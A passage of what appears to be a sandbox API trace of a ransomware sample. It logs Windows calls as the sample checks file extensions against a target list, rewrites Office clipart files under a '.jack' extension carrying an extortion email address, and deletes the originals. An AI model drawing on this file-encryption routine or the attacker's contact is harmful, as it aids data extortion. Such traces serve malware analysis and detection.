dwFileAttributes=0x220) returned 1 [0209.767] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif")) returned 1 [0209.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0209.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0209.768] lstrlenW (lpString=".doc") returned 4 [0209.768] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0209.768] lstrlenW (lpString=".docx") returned 5 [0209.768] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0209.768] lstrlenW (lpString=".pdf") returned 4 [0209.768] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0209.768] lstrlenW (lpString=".xls") returned 4 [0209.768] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0209.768] lstrlenW (lpString=".xlsx") returned 5 [0209.768] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0209.768] lstrlenW (lpString=".ppt") returned 4 [0209.768] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0209.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0209.768] lstrlenW (lpString=".zip") returned 4 [0209.768] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.768] lstrlenW (lpString=".rar") returned 4 [0209.768] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.768] lstrlenW (lpString=".bz2") returned 4 [0209.768] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0209.768] lstrlenW (lpString=".7z") returned 3 [0209.768] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0209.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0209.768] lstrlenW (lpString=".dbf") returned 4 [0209.768] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0209.769] lstrlenW (lpString=".1cd") returned 4 [0209.769] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0209.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0209.769] lstrlenW (lpString=".jpg") returned 4 [0209.769] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0209.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0209.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0209.769] lstrlenW (lpString=".doc") returned 4 [0209.769] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0209.769] lstrlenW (lpString=".docx") returned 5 [0209.769] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0209.769] lstrlenW (lpString=".pdf") returned 4 [0209.769] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0209.769] lstrlenW (lpString=".xls") returned 4 [0209.769] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0209.769] lstrlenW (lpString=".xlsx") returned 5 [0209.769] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0209.769] lstrlenW (lpString=".ppt") returned 4 [0209.769] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0209.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0209.769] lstrlenW (lpString=".zip") returned 4 [0209.769] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.769] lstrlenW (lpString=".rar") returned 4 [0209.769] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.769] lstrlenW (lpString=".bz2") returned 4 [0209.769] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0209.769] lstrlenW (lpString=".7z") returned 3 [0209.770] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0209.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0209.770] lstrlenW (lpString=".dbf") returned 4 [0209.770] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0209.770] lstrlenW (lpString=".1cd") returned 4 [0209.770] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0209.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0209.770] lstrlenW (lpString=".jpg") returned 4 [0209.770] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0209.770] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0209.770] lstrlenW (lpString="AG00142_.GIF") returned 12 [0209.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0210.264] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=15308) returned 1 [0210.265] CloseHandle (hObject=0x3f4) returned 1 [0210.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif")) returned 0x220 [0210.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0210.600] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0210.600] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.600] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.600] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0210.600] GetLastError () returned 0x0 [0210.600] ReadFile (in: hFile=0x40c, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x3bcc, lpOverlapped=0x0) returned 1 [0214.531] WriteFile (in: hFile=0x3ec, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x3bd0, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x3bd0, lpOverlapped=0x0) returned 1 [0214.532] ReadFile (in: hFile=0x40c, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0214.532] WriteFile (in: hFile=0x3ec, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xec, lpOverlapped=0x0) returned 1 [0214.532] SetEndOfFile (hFile=0x3ec) returned 1 [0214.532] CloseHandle (hObject=0x3ec) returned 1 [0214.740] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0214.740] SetEndOfFile (hFile=0x40c) returned 1 [0214.741] CloseHandle (hObject=0x40c) returned 1 [0214.741] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0214.741] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif")) returned 1 [0214.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0214.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0214.852] lstrlenW (lpString=".doc") returned 4 [0214.852] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0214.852] lstrlenW (lpString=".docx") returned 5 [0214.853] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0214.853] lstrlenW (lpString=".pdf") returned 4 [0214.853] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0214.853] lstrlenW (lpString=".xls") returned 4 [0214.853] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0214.853] lstrlenW (lpString=".xlsx") returned 5 [0214.853] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0214.853] lstrlenW (lpString=".ppt") returned 4 [0214.853] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0214.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0214.853] lstrlenW (lpString=".zip") returned 4 [0214.853] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0214.853] lstrlenW (lpString=".rar") returned 4 [0214.853] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0214.853] lstrlenW (lpString=".bz2") returned 4 [0214.853] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0214.853] lstrlenW (lpString=".7z") returned 3 [0214.853] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0214.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0214.853] lstrlenW (lpString=".dbf") returned 4 [0214.853] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0214.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0214.853] lstrlenW (lpString=".1cd") returned 4 [0214.853] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0214.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0214.853] lstrlenW (lpString=".jpg") returned 4 [0214.853] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0214.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0214.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0214.853] lstrlenW (lpString=".doc") returned 4 [0214.853] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0214.853] lstrlenW (lpString=".docx") returned 5 [0214.854] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0214.854] lstrlenW (lpString=".pdf") returned 4 [0214.854] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0214.854] lstrlenW (lpString=".xls") returned 4 [0214.854] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0214.854] lstrlenW (lpString=".xlsx") returned 5 [0214.854] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0214.854] lstrlenW (lpString=".ppt") returned 4 [0214.854] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0214.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0214.854] lstrlenW (lpString=".zip") returned 4 [0214.854] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0214.854] lstrlenW (lpString=".rar") returned 4 [0214.854] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0214.854] lstrlenW (lpString=".bz2") returned 4 [0214.854] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0214.854] lstrlenW (lpString=".7z") returned 3 [0214.854] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0214.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0214.854] lstrlenW (lpString=".dbf") returned 4 [0214.854] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0214.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0214.854] lstrlenW (lpString=".1cd") returned 4 [0214.854] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0214.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0214.855] lstrlenW (lpString=".jpg") returned 4 [0214.855] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0214.855] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0214.855] lstrlenW (lpString="AG00167_.GIF") returned 12 [0214.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0214.856] GetFileSizeEx (in: hFile=0x3ec, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=4894) returned 1 [0214.856] CloseHandle (hObject=0x3ec) returned 1 [0214.856] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif")) returned 0x220 [0214.856] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0214.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0214.857] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0214.858] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0214.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0215.092] GetLastError () returned 0x0 [0215.092] ReadFile (in: hFile=0x3f4, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x131e, lpOverlapped=0x0) returned 1 [0215.126] WriteFile (in: hFile=0x454, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x1320, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x1320, lpOverlapped=0x0) returned 1 [0215.127] ReadFile (in: hFile=0x3f4, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0215.127] WriteFile (in: hFile=0x454, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xec, lpOverlapped=0x0) returned 1 [0215.127] SetEndOfFile (hFile=0x454) returned 1 [0215.127] CloseHandle (hObject=0x454) returned 1 [0215.128] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.128] SetEndOfFile (hFile=0x3f4) returned 1 [0215.128] CloseHandle (hObject=0x3f4) returned 1 [0215.128] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0215.129] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif")) returned 1 [0215.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0215.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0215.129] lstrlenW (lpString=".doc") returned 4 [0215.129] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0215.129] lstrlenW (lpString=".docx") returned 5 [0215.129] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0215.129] lstrlenW (lpString=".pdf") returned 4 [0215.129] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0215.129] lstrlenW (lpString=".xls") returned 4 [0215.129] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0215.129] lstrlenW (lpString=".xlsx") returned 5 [0215.129] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0215.129] lstrlenW (lpString=".ppt") returned 4 [0215.129] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0215.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0215.130] lstrlenW (lpString=".zip") returned 4 [0215.130] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0215.130] lstrlenW (lpString=".rar") returned 4 [0215.130] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0215.130] lstrlenW (lpString=".bz2") returned 4 [0215.130] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0215.130] lstrlenW (lpString=".7z") returned 3 [0215.130] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0215.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0215.130] lstrlenW (lpString=".dbf") returned 4 [0215.130] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0215.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0215.130] lstrlenW (lpString=".1cd") returned 4 [0215.130] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0215.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0215.130] lstrlenW (lpString=".jpg") returned 4 [0215.130] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0215.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0215.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0215.130] lstrlenW (lpString=".doc") returned 4 [0215.130] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0215.130] lstrlenW (lpString=".docx") returned 5 [0215.130] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0215.130] lstrlenW (lpString=".pdf") returned 4 [0215.130] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0215.130] lstrlenW (lpString=".xls") returned 4 [0215.130] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0215.130] lstrlenW (lpString=".xlsx") returned 5 [0215.130] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0215.130] lstrlenW (lpString=".ppt") returned 4 [0215.130] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0215.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0215.130] lstrlenW (lpString=".zip") returned 4 [0215.131] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0215.131] lstrlenW (lpString=".rar") returned 4 [0215.131] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0215.131] lstrlenW (lpString=".bz2") returned 4 [0215.131] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0215.131] lstrlenW (lpString=".7z") returned 3 [0215.131] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0215.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0215.131] lstrlenW (lpString=".dbf") returned 4 [0215.131] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0215.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0215.131] lstrlenW (lpString=".1cd") returned 4 [0215.131] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0215.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0215.131] lstrlenW (lpString=".jpg") returned 4 [0215.131] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0215.131] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0215.131] lstrlenW (lpString="AG00170_.GIF") returned 12 [0215.131] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0215.131] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=9248) returned 1 [0215.131] CloseHandle (hObject=0x3f4) returned 1 [0215.131] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif")) returned 0x220 [0215.132] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0215.132] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0215.132] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.132] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.132] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0215.132] GetLastError () returned 0x0 [0215.132] ReadFile (in: hFile=0x3f4, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x2420, lpOverlapped=0x0) returned 1 [0215.195] WriteFile (in: hFile=0x454, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x2430, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x2430, lpOverlapped=0x0) returned 1 [0215.196] ReadFile (in: hFile=0x3f4, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0215.196] WriteFile (in: hFile=0x454, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xec, lpOverlapped=0x0) returned 1 [0215.196] SetEndOfFile (hFile=0x454) returned 1 [0215.196] CloseHandle (hObject=0x454) returned 1 [0215.198] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.198] SetEndOfFile (hFile=0x3f4) returned 1 [0215.199] CloseHandle (hObject=0x3f4) returned 1 [0215.199] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0215.199] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif")) returned 1 [0215.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0215.200] lstrlenW 